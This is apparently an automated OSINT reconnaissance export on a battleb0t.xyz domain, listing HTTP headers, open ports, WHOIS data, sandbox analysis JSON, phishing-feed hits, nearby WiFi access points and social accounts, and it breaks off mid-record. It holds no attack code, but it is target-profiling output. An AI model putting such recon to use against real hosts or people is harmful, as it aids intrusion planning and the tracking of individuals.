| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:80 | 188.114.97.0/24 |
| 2023-05-12 02:58:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.148.97.127'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.rstudio.com/products/rstudio/download', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC7EB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC84B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "8.253.153.249:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_816"\n "IsoScope_330_ConnHashTable<816>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_330_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_330_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_330_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_330_IE_EarlyTabStart_0xd98_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabC84A.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "CabC7DB.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002536]\n "ELPH40UT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ELPH40UT.txt]- [targetUID: 00000000-00002536]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "RecoveryStore._AEA96325-292B-11ED-8B93-0800279B5FAD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3P2LE1FN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3P2LE1FN.txt]- [targetUID: 00000000-00000816]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000816]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002536]\n "E6734D742F7EACE89FEB45D5D714A843" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E6734D742F7EACE89FEB45D5D714A843]- [targetUID: 00000000-00002536]\n "CabC84A.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\CabC84A.tmp]- [targetUID: 00000000-00002536]\n "TarC7EB.tmp" has type "data"- Location: [%TEMP%\\TarC7EB.tmp]- [targetUID: 00000000-00002536]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00000816]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00000816]\n "~DF67AFBECAEE98A9BA.TMP" has type "data"- Location: [%TEMP%\\~DF67AFBECAEE98A9BA.TMP]- [targetUID: 00000000-00000816]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /products/rstudio/download HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.rstudio.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_34.148.97.127]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.rstudio.com/products/rstudio/download"- [Source: Input]\n Pattern match: "https://www.rstudio.com"- [Source: Input]\n Pattern match: "www.rstudio.com"- [Source: SSL_34.148.97.127]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: http://www.wargaming-event-system.com/ (AV positives: 1/88 scanned on 08/31/2022 14:16:32)\n URL: https://fluffy-peony-156fca.netlify.app/ (AV positives: 13/88 scanned on 08/31/2022 13:50:42)\n URL: http://zingy-moonbeam-281a55.netlify.app/ (AV positives: 11/88 scanned on 08/31/2022 13:38:03)\n URL: https://www.toprankedtechgadgetsnow.com/p/fl?affid=8929&provider=Affiliati&click_id=1912bde62d05461889c7b8d0d3a539da&c1=&c2=509263335&c3=Tacticallife081622&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/31/2022 13:27:46)\n URL: https://www.toprankedtechgadgetsnow.com/p/fl?affid=8929&provider=Affiliati&click_id=eac1dfb1dfac4350bf36d716be9b3df5&c1=&c2=509246856&c3=083122pwcnoncertified1am&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/31/2022 12:28:15)\n File SHA256: 0ed0e7d46b909b95a698b16cb862be6bea2beba587651f89726e8560f6a9f118 (AV positives: 12/75 scanned on 08/24/2022 23:22:15)\n File SHA256: 1ccdbc5ab117d40f615d00693ee5ef1e7e7c29183c0fea04434bef5bfa80ca14 (AV positives: 7/75 scanned on 08/24/2022 22:55:22)\n File SHA256: 84a36305469deac7a84dd3b013c26cba43e01ea2ada5687ffc9ee5382ff3ddb6 (AV positives: 21/74 scanned on 08/22/2022 16:02:09)\n File SHA256: ed519561b155ef7b685ef981c466638407317d9d8eb0f5236a3a48f0575f6545 (AV positives: 27/75 scanned on 08/16/2022 18:17:19)\n File SHA256: 524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b (AV positives: 56/75 scanned on 08/12/2022 02:05:05)'}], u'threat_level': 0, u'size': None, u'job_id': u'630f750e6c7fb81d162985b2', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.148.97.127', u'8.253.1 | 34.148.97.127 |
| 2023-05-12 03:17:37 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ashu.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.60): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:8080 | 188.114.97.0/24 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:8080 | 188.114.97.0/24 |
| 2023-05-12 02:54:54 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c552e7289ff8729-ORD
Content-Encoding: gzip
| 2a06:98c1:3121::1 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Instagram (Category: social)
https://instagram.com/dawidsulej | dawidsulej |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00ty.github.io]
https://www.openphish.com/feed.txt | 00ty.github.io |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 4170004919 (Net ID: 00:0B:6B:20:D9:EC) | 39.0469, -77.4903 |
| 2023-05-12 03:09:51 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.92 |
| 2023-05-12 02:54:15 | HTTP Headers | No | Web Spider | 8 | 0 | 2 | 0 | None | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} | www.battleb0t.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE070 (Net ID: 98:2C:BE:4F:F5:49) | 37.751, -97.822 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 218.30.196.104.bc.googleusercontent.com | 104.196.30.218 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 124.97.148.34.bc.googleusercontent.com | 34.148.97.124 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.134): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Disqus (Category: social)
https://disqus.com/by/login/ | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F8E2 (Net ID: 00:1D:D6:B4:F8:E0) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:09:56) | 41.8781, -87.6298 |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 02:54:23 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:54:25 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 28, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://lu.ma/y9yw6eqo', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7888:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7888:120:WilError_01"\n "Local\\SM0:8012:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:8012:120:WilError_01"\n "SM0:8012:120:WilError_01"\n "SM0:7888:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.66.43.101:443"\n "104.16.56.101:443"\n "142.250.188.8:443"\n "34.120.195.249:443"\n "54.203.115.111:443"\n "142.250.191.74:443"\n "151.101.0.176:443"\n "142.250.191.78:443"\n "172.217.164.99:443"\n "142.250.101.156:443"\n "108.139.1.127:443"\n "108.139.1.104:443"\n "52.23.144.23:443"\n "35.174.127.31:443"\n "34.209.51.54:443"\n "44.228.114.110:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.lu.ma"\n "cdn.lu.ma"\n "lu.ma"\n "nexus-websocket-a.intercom.io"\n "o370968.ingest.sentry.io"\n "static.cloudflareinsights.com"\n "vitals.vercel-insights.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- [targetUID: N/A]\n "f_00024d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 6400x3200 components 3"- [targetUID: N/A]\n "5f16b7f9d1607ad6_0" has type "data"- [targetUID: N/A]\n "989898b72cc58f9e_0" has type "data"- [targetUID: N/A]\n "23a55676-8174-4a5e-89fc-143bd604c96f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\index]- [targetUID: 00000000-00007888]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "5e9a6eefc2fa1f8f_0" has type "data"- [targetUID: N/A]\n "f_00023e" has type "data"- [targetUID: N/A]\n "cc4ad257c5413c5b_0" has type "data"- [targetUID: N/A]\n "c4595e73-7693-4c82-9c12-a950739b1d75.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "83213497a6b2b947_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\83213497a6b2b947_0]- [targetUID: 00000000-00007888]\n "d646c3a66fcaef39_0" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "d96dbad775832460_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "data"- [targetUID: N/A]\n "9d4d031f25631c01_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007580]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7888_284643122\\Ruleset Data]- [targetUID: 00000000-00007888]\n "4a0cb44c6cfe27cf_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4a0cb44c6cfe27cf_0]- [targetUID: 00000000-00007888]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://lu.ma/y9yw6eqo"\n Heuristic match: "api.lu.ma"\n Heuristic match: "cdn.lu.ma"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://lu.ma"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "lu.ma"\n Heuristic match: "nexus-websocket-a.intercom.io"\n Heuristic match: "o370968.ingest.sentry.io"\n Heuristic match: "static.cloudflareinsights.com"\n Heuristic match: "vitals.vercel-insights.com"\n Pattern match: 